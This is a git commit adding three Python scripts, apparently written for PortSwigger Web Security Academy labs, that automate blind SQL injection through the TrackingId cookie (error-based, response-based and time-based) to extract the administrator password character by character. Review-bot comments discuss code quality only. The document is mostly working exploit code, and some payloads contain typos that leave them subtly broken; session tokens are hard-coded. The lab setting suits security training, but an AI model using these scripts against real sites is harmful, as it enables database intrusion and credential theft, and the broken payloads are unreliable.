
Commit 8d96e10

committed
SQLi
1 parent 434945e commit 8d96e10


3 files changed

+161
-0
lines changed


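--- a/Blind_SQL_error.py
+++ b/Blind_SQL_error.py
@@ -0,0 +1,53 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+import requests, signal, time, pdb, sys, string
+
+def def_handler(sig, frame):
+print("\n\n[!] Saliendo...\n")
+sys.exit(1)
+
+# Ctrl+c
+signal.signal(signal.SIGINT, def_handler)
+
+main_url = "http://0a4b007e0401649ac115430c007b00b9.web-security-academy.net"
+characters = string.ascii_lowercase + string.digits
+#string.printable cambiar
+
+def makeRequest():
+
+password = ""
+
+p1 = log.progress("Brute force")
+p1.status("Initiating brute-force attack")
+
+time.sleep(2)
+
+p2 = log.progress("Password")
+
+for position in range(1, 21):
+for character in characters:
+
+cookies = {
+'TrackingId': "TrackingId=c8WPLgAK19wQMrGn'||(select case when(password,%d,1)='%s' then to char(1/0) else '' en from users where username='administrator')||'" % (position, character),
+'session': 'zqRDUFxuLgZvJZXzNJG6bGulmxHMHEoc'
+}
+
+p1.status(cookies['TrackingId'])
+
+r = requests.get(main_url, cookies=cookies)
+
+if r.status_code == 500 : # codigo de estado
+password += character
+
+p2.status(password)
+
+break
+
+if __name__ == '__main__':
+
+makeRequest()
+
+
+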
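Review bot: The `session` cookie on line 34 and the lab host on line 14 are hard-coded literals, so a live session token is committed to version control and the script is tied to one instance; Blind_SQL_response.py and Blind_SQL_time.py have the same pattern. Take both from the command line or the environment, e.g. `main_url = sys.argv[1]` and `'session': os.environ['LAB_SESSION']` (with `import os` added to line 5), and treat the token already pushed as disclosed. `requests.get(main_url, cookies=cookies)` on line 39 sets no `timeout=`, so a stalled connection blocks the loop indefinitely; `requests.get(main_url, cookies=cookies, timeout=10)` bounds each request (same line in the other two files). `makeRequest` has no docstring, takes no arguments and discards `password` once the loops end — only the progress bar ever sees it — so add a one-line docstring stating that it reports the recovered value through the pwntools progress bars, and finish with `return password`. `pdb` on line 5 is imported and never used, and `from pwn import *` is a wildcard import used only for `log`; `from pwn import log` names the one dependency.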

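--- a/Blind_SQL_response.py
+++ b/Blind_SQL_response.py
@@ -0,0 +1,52 @@
+#!/usr/bin/python3
+from pwn import *
+
+import requests, signal, time, pdb, sys, string
+
+def def_handler(sig, frame):
+print("\n\n[!] Saliendo...\n")
+sys.exit(1)
+
+# Ctrl+c
+signal.signal(signal.SIGINT, def_handler)
+
+main_url = "http://0aed003f04b171d6c0d8733f007500a2.web-security-academy.net"
+characters = string.ascii_lowercase + string.digits
+#string.printable cambiar
+
+def makeRequest():
+
+password = ""
+
+p1 = log.progress("Brute force")
+p1.status("Initiating brute-force attack")
+
+time.sleep(2)
+
+p2 = log.progress("Password")
+
+for position in range(1, 21):
+for character in characters:
+
+cookies = {
+'TrackingId' : "SShXhd6uxRNk8MKi' and (select substring(password,%d,1) from users where username='administrator')='%s" % (position, character),
+'session' : 'NpzSjVIK9dUjtKxgyQkwEJLSKJ5uj6Gy'
+}
+
+p1.status(cookies['TrackingId'])
+
+r = requests.get(main_url, cookies=cookies)
+
+if "Welcome back!" in r.text:
+password += character
+
+p2.status(password)
+
+break
+
+if __name__ == '__main__':
+
+makeRequest()
+
+
+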

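--- a/Blind_SQL_time.py
+++ b/Blind_SQL_time.py
@@ -0,0 +1,56 @@
+#!/usr/bin/python3
+from pwn import *
+
+import requests, signal, time, pdb, sys, string
+
+def def_handler(sig, frame):
+print("\n\n[!] Saliendo...\n")
+sys.exit(1)
+
+# Ctrl+c
+signal.signal(signal.SIGINT, def_handler)
+
+main_url = "http://0aed003f04b171d6c0d8733f007500a2.web-security-academy.net"
+characters = string.ascii_lowercase + string.digits
+#string.printable cambiar
+
+def makeRequest():
+
+password = ""
+
+p1 = log.progress("Brute force")
+p1.status("Initiating brute-force attack")
+
+time.sleep(2)
+
+p2 = log.progress("Password")
+
+for position in range(1, 21):
+for character in characters:
+
+cookies = {
+'TrackingId' : "SShXhd6uxRNk8MKi'||(select case when (password,%d,1)='%s' then pg_sleep(1.5) else pg_sleep(0) end from users where username='administrator')-- -" % (position, character),
+'session' : 'NpzSjVIK9dUjtKxgyQkwEJLSKJ5uj6Gy'
+}
+
+p1.status(cookies['TrackingId'])
+
+time_start = time.time()
+
+r = requests.get(main_url, cookies=cookies)
+
+time_end = time.time()
+
+if time_end - time_start > 1.5:
+password += character
+
+p2.status(password)
+
+break
+
+if __name__ == '__main__':
+
+makeRequest()
+
+
+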
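Review bot: `time_start = time.time()` and `time_end = time.time()` on lines 38 and 42 measure an elapsed interval with the wall clock, which can step under clock adjustment and silently distort the `time_end - time_start > 1.5` comparison on line 44; `time.monotonic()` is the clock meant for durations, so change both lines to `time_start = time.monotonic()` and `time_end = time.monotonic()`. The comparison on line 44 deserves a comment making the measurement explicit, e.g. `# elapsed time covers the whole HTTP round-trip, not only server-side processing`. The hard-coded session cookie and the missing `timeout=` on the `requests.get` call are the same points as raised on Blind_SQL_error.py.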
